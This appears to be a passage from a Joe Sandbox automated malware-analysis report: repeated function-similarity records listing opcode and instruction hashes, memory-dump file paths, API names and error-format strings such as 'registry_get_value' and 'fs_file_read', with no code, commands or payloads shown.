                                                      • Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
                                                      • Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction ID: 18147115ffd0d6aa4155448b683403e5b05aa8e5a269ff54b94754b0fe82d52d
                                                      • Opcode Fuzzy Hash: ae85d74ad03701d99a47d3b1f8a3a69ee898c65ee74bc562a5c34de23c39dca6
                                                      • Instruction Fuzzy Hash: ACF05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA9C68320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 44a2947c2810745d01f8211b4376d8c13ba4dfe3177a58a20cd48993161b93f4
                                                      • Instruction ID: e8ee5fcb3e825379daa7fc6eb3216b64b72d1851db55524c31a2796ccae8cc8f
                                                      • Opcode Fuzzy Hash: 44a2947c2810745d01f8211b4376d8c13ba4dfe3177a58a20cd48993161b93f4
                                                      • Instruction Fuzzy Hash: 26F0F66670A74E52EA538F00F8587792254BF42BA4F080236EE5D477D2EF3ED9899308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 6910d879578be204291e0ac69aa017fcdff08f4ac4e3167abbe6aae66f0fe57f
                                                      • Instruction ID: 1738afd61a255a34af941dc2a059de77f170ba4da30f0f663046f9766e37d3e5
                                                      • Opcode Fuzzy Hash: 6910d879578be204291e0ac69aa017fcdff08f4ac4e3167abbe6aae66f0fe57f
                                                      • Instruction Fuzzy Hash: 71F0F66670A64E52E9538F00FC587792254BF42BA4F080236EE1D473D2EF3ED9899308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: aa48802192c854cc546cfbcb6e554b8a9b3086c09c062a5397e6ab46ec809a05
                                                      • Instruction ID: 4cea3cf1b8982bfc733fe05fc0e4d91fa4ddeb4fe963e4cdd387a7fcb1ba78a0
                                                      • Opcode Fuzzy Hash: aa48802192c854cc546cfbcb6e554b8a9b3086c09c062a5397e6ab46ec809a05
                                                      • Instruction Fuzzy Hash: 53F0F66670A74E52E9538F00B8687792254BF42BA5F080236EE1D473D2EF3ED9899308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: bca688cdaa0b7501fed483a5b10b6253b738036845691a3789c10daad3c74d0d
                                                      • Instruction ID: 706394daf772d9f544b41ead4f7ef42e82cac02566db3bd68d08d8ea03b40322
                                                      • Opcode Fuzzy Hash: bca688cdaa0b7501fed483a5b10b6253b738036845691a3789c10daad3c74d0d
                                                      • Instruction Fuzzy Hash: EEF0F66670A64E52E9538F00B8587796254BF42BA4F080236EE1D477D2EF3ED9899308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 022898d8f5bd0615f91a07a972d7260e261b4f7e707cc9481ed84de0cfb1a0b9
                                                      • Instruction ID: fe377abb4b25d9c6f62909e4f232becfbd8497a0fec4be96d56f84d66a428ffb
                                                      • Opcode Fuzzy Hash: 022898d8f5bd0615f91a07a972d7260e261b4f7e707cc9481ed84de0cfb1a0b9
                                                      • Instruction Fuzzy Hash: 87F0FC6670A64E51E9538F00BC587752254BF42B94F080136DE1D473D2EF3DD9459304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 665743573851454454ba538c1e50c16943c9fe146876193c875de75a4f8b0fed
                                                      • Instruction ID: 5a32b865329c65103b22907229781c34a5bdd349b4c7bb1588adab00df91674f
                                                      • Opcode Fuzzy Hash: 665743573851454454ba538c1e50c16943c9fe146876193c875de75a4f8b0fed
                                                      • Instruction Fuzzy Hash: 3DF0F62BB0A68EC1E553CF40FC503752254BF42BA4F480136DD0D46392EF2DEA8AC304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 0762fc2cb1aba46cbd9c07251b0a1a3a97b6b7f0123497747c2785a4a9737169
                                                      • Instruction ID: dba94056e40ed550188ca561cddcbfff838dce98b6f76d2748928f36fcce5067
                                                      • Opcode Fuzzy Hash: 0762fc2cb1aba46cbd9c07251b0a1a3a97b6b7f0123497747c2785a4a9737169
                                                      • Instruction Fuzzy Hash: 16F0F62BB0A78EC5E553CF40F8503752254AF42BA5F480236DD0D46392EF2DEA8AC304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: efea60717c5cd3337c7cdb5f2f726892b9ed2473e78e612ae385b2e3917266b9
                                                      • Instruction ID: c976a74745a3aef4b1a391b473189b1e32a0cda69fb8eb3e7e5a57d827cd1dc3
                                                      • Opcode Fuzzy Hash: efea60717c5cd3337c7cdb5f2f726892b9ed2473e78e612ae385b2e3917266b9
                                                      • Instruction Fuzzy Hash: 79F0F62BB0A78EC2E553CF40F8503756254AF42BA4F480136DD0D86792EF2DEA8AC304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: b7b11434295f38ce3cc38029b6fcd9c2daf9401dfd118b0b22f82ab2cf596224
                                                      • Instruction ID: a4a0e05aff9126d8b9b9e5df18d0b512170cdae4707d74384d0960f509f0bcb6
                                                      • Opcode Fuzzy Hash: b7b11434295f38ce3cc38029b6fcd9c2daf9401dfd118b0b22f82ab2cf596224
                                                      • Instruction Fuzzy Hash: D1F0C22BB0A68E81E553CF40F8503752254AF42BA4F480136DD0D46392EF2DEA8AC304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: b23563d9c9b30c40a0829dfa9c2e5754b3fbf0a149fdb7cb53c5482f5b5d878b
                                                      • Instruction ID: 6c03c73e2e3c85f33250f088f1f25316bb6ca2868a288d33f86ef1ae2fe05696
                                                      • Opcode Fuzzy Hash: b23563d9c9b30c40a0829dfa9c2e5754b3fbf0a149fdb7cb53c5482f5b5d878b
                                                      • Instruction Fuzzy Hash: A5F0F62BB0A78EC1E653CF40F8503752254BF42BA4F080236DD4D46792EF2DEA8AD304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 5efb9e9ee29dc520bb349b9fe77adf778f379b043b44a299b9e0271328daa642
                                                      • Instruction ID: d9dd09d1882e60c71e80aa1470535a98f7bb75becb51a61c158f68804db50b1f
                                                      • Opcode Fuzzy Hash: 5efb9e9ee29dc520bb349b9fe77adf778f379b043b44a299b9e0271328daa642
                                                      • Instruction Fuzzy Hash: 92F0CD2270A20A82E5529B00BC503BA6254AF407F5F480236ED9D467D2EF2DD9D9AB48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: c9e1c4e72542d293f4f7c38c434bdaa79406ce81bed1867eaacfef0332bc61ac
                                                      • Instruction ID: 9dd76431777916f1719a3583f0e34ca9219247326996c9432e613ff88f76e926
                                                      • Opcode Fuzzy Hash: c9e1c4e72542d293f4f7c38c434bdaa79406ce81bed1867eaacfef0332bc61ac
                                                      • Instruction Fuzzy Hash: 21F0CD2270A30A82E5529B00B8603BA6254AF407F5F480236ED9D46792EF2DD9D9AB48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 7e712a24bfc18a2ef7346bed346fb8b76471770fb1bf9d5f46ee9cae0fc4f40d
                                                      • Instruction ID: 2747a379bfe7e190fe7c11ad344ca1a4499fc4b8f36d87c86d786e3f92870470
                                                      • Opcode Fuzzy Hash: 7e712a24bfc18a2ef7346bed346fb8b76471770fb1bf9d5f46ee9cae0fc4f40d
                                                      • Instruction Fuzzy Hash: DBF0CD2270A20A82E5529B00B8503BA6254AF407F5F480236ED9D46792EF2DD9D9AB48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 54484f0d1ab608449beaedbf91fc840c736ed0b0363b8843ac4bd8e6068824a9
                                                      • Instruction ID: a9056f50c7018f244d6757ed054d590917c4c4099d51f04f95a3c38a463443c5
                                                      • Opcode Fuzzy Hash: 54484f0d1ab608449beaedbf91fc840c736ed0b0363b8843ac4bd8e6068824a9
                                                      • Instruction Fuzzy Hash: B4F0C22270A20681E5529B00BC503796254AF407F5F480236DD9D46792EF2DD9D9A748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 63853b8f4cdf748eb39a6ffd810eedd0ad9d35cc9a5385b2a08ee39dbdd322e5
                                                      • Instruction ID: 4d88872ed677bea76dcdc97c207d5ce92f3e31c4a4924ce7759847601b62a857
                                                      • Opcode Fuzzy Hash: 63853b8f4cdf748eb39a6ffd810eedd0ad9d35cc9a5385b2a08ee39dbdd322e5
                                                      • Instruction Fuzzy Hash: B5F0C22270A30681E5529B00B8503796254AF407F4F480236DD9D46792EF2DD9D9A748
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: f95c7f613990e8359955edc98602e44f65324a22fc2a34fe8abc44b0cfde0c07
                                                      • Instruction ID: 6a1b8318df53ff2570f84d8adb9df056e0aeca4c2fda26583e5eb028a5148c45
                                                      • Opcode Fuzzy Hash: f95c7f613990e8359955edc98602e44f65324a22fc2a34fe8abc44b0cfde0c07
                                                      • Instruction Fuzzy Hash: CFF02BA260874741E952AF10FC80BF6B654FF40798F880236ED5E47694DF3CD9899310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 39aaf49a42b38c45c43456f641b73758d388b580c46ae1c3321e64665559df8d
                                                      • Instruction ID: 9254aef54101f814b5272a51a605eb96f12612acc4d1dc74f20135b18163622f
